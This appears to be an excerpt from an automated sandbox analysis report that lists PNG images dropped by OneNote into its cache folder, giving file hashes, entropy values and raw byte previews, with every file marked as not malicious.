Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s\|.....C.$@.$.....t.!........8......RR....<...6..P\|\|....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O\|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.\|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e.....UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ).(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....\|g..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004G.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	22634
Entropy (8bit):	7.974332204835705
Encrypted:	false
SSDEEP:	384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
MD5:	548D234C9AB4021CA5FAB7BF22502465
SHA1:	2F7495D250DC86EA99473CC342D164B859926021
SHA-256:	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
SHA-512:	261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
Malicious:	false
Preview:	.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O\|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../\|.O........7_...Oj....\|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[\|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.\|..kv....];j\|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9\|.m.+`).\|......x..vak-].../.....G'....4.>B6$.......-o.q..L;.N+....>...=.!.Y..Q...?......7..,....}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004H.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13737
Entropy (8bit):	7.916899917415529
Encrypted:	false
SSDEEP:	384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
MD5:	830632032C7DDBCCDE126F4BAE935540
SHA1:	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
SHA-256:	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
SHA-512:	5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
Malicious:	false
Preview:	.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004I.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13241
Entropy (8bit):	7.931391290415517
Encrypted:	false
SSDEEP:	384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
MD5:	01367FEEE0A83E8765E971E0D3740900
SHA1:	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
SHA-256:	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
SHA-512:	8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......EX........wo9..9.\|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~..U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J.w.mdv.&..@....R..o/.^..5...x.g.>..ag....GM\|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B\|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004J.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4490
Entropy (8bit):	7.928016176674318
Encrypted:	false
SSDEEP:	96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
MD5:	7F161B19B937AB48D4FD2F6E5E16FDBD
SHA1:	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
SHA-256:	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
SHA-512:	E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
Malicious:	false
Preview:	.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.\|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.\|...\.z..6j>..n....Y.&G.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P.....'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^.....W..?}t...{.B.8..D...UPa..~..C...\|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.......G...K.....e...b.\|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004K.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	17289
Entropy (8bit):	7.962998633267186
Encrypted:	false
SSDEEP:	384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
MD5:	708E8EB906BC105CCA0535AE669AA651
SHA1:	38D82DEDFE97D3001188C2E18FE13BD741FD520F
SHA-256:	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
SHA-512:	1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }...B@....i<8.....B@.T2 .........xp..! .....d@...!......(B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'\|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004L.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2332
Entropy (8bit):	7.8822150338370776
Encrypted:	false
SSDEEP:	48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
MD5:	91CB7F1273AA003076401081B8A22237
SHA1:	5157144069E7D2FDAE60B397BE5851E75BDF7707
SHA-256:	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
SHA-512:	5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
Malicious:	false
Preview:	.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r\|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..\|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004M.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	16003
Entropy (8bit):	7.959532793770661
Encrypted:	false
SSDEEP:	384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
MD5:	3A5CD52E925A7C4A345047D8F06C3C41
SHA1:	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
SHA-256:	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
SHA-512:	8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..\|.....+)..H..C.K... ....x).rU..T..E...;.....@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z.GJ...."@zJ}...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[\|\|...t.T.w .. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004N.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	7.836744258175623
Encrypted:	false
SSDEEP:	24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
MD5:	B1FDE66F75507567B5F0C6C07B01A3A1
SHA1:	80B8E6A923E853232F66C874367E90B5C9CAD7AE
SHA-256:	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
SHA-512:	FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
Malicious:	false
Preview:	.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M..J.....".4....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o\|.?.......;C\|.#.../v.H.......o~.{G......H.\|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P\|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O\|.D...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004O.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4190
Entropy (8bit):	7.94161730428269
Encrypted:	false
SSDEEP:	96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
MD5:	8B3AEC1986A522951942BA72B85CCAA0
SHA1:	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
SHA-256:	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
SHA-512:	8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
Malicious:	false
Preview:	.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...\|\|...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...\|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004P.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.943341403425058
Encrypted:	false
SSDEEP:	96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
MD5:	817D5A35EDB2B0E052194D4F49FDA19C
SHA1:	FA6CB2016C5F43B76102B63D60359139227E07EA
SHA-256:	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
SHA-512:	E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
Malicious:	false
Preview:	.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b...%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....\|=.#.=.32..o.<.TnQ....g.zN...n...!/.........!....F..]...6...m...CX..~...+..U...E.\|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}.....N...N.\|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv\|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004Q.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8184
Entropy (8bit):	7.807848176906598
Encrypted:	false
SSDEEP:	192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
MD5:	5B386BF9A20766956A84F67F913F23D7
SHA1:	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
SHA-256:	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
SHA-512:	99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..\|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.\|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004R.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.950380155401321
Encrypted:	false
SSDEEP:	96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
MD5:	BC6C08F8C2C6D1EEE95ABFC40C3C3669
SHA1:	44DE7375375880ACC24938D7E92A837E85C35321
SHA-256:	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
SHA-512:	2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
Malicious:	false
Preview:	.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_...c..n.......?....wa..l...p....E.Ly.}......C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<\|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...\|....\..O.....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...\|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..k.Y....z.;?..^...3.4\|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004S.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2599
Entropy (8bit):	7.903700862190034
Encrypted:	false
SSDEEP:	48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
MD5:	E88131C9AAC52649FF044905ACAB9B76
SHA1:	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
SHA-256:	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
SHA-512:	97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
Malicious:	false
Preview:	.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B\|E..>.....Q........b[.K........m.(..... ...!%1%-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.\|...Yszl.N.:......KPs.):).T.5...&B.....5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.\|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......\|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.\|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004T.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1570
Entropy (8bit):	7.780157858994452
Encrypted:	false
SSDEEP:	48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
MD5:	EF9AA5B2ADBE5DF68AC4F4D716DF7708
SHA1:	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
SHA-256:	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
SHA-512:	EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
Malicious:	false
